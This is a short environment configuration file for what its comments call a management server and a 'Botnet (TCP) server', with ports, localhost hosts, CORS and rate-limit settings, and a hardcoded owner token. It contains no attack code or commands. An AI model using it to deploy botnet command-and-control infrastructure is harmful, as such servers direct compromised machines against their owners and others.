# Environment Configuration
NODE_ENV="development" # Options: 'development', 'production'
HTTP_PORT="3000"            # The port your server will listen on (Management server)
TCP_PORT="8080"         # The port where Botnet (TCP) server listen on
HOST="localhost"       # Hostname for the server
TCP_HOST='127.0.0.1'    # Hostname for the tcp server

# CORS Settings
CORS_ORIGIN="http://localhost:*" # Allowed CORS origin, adjust as necessary

############# DO NOT TOUCH THIS ###############
COMMON_RATE_LIMIT_WINDOW_MS="1000" # Window size for rate limiting (ms)
COMMON_RATE_LIMIT_MAX_REQUESTS="20" # Max number of requests per window per IP
############# DO NOT TOUCH THIS ###############


OWNER_TOKEN="AD010101010101010101010101010101" # The first token created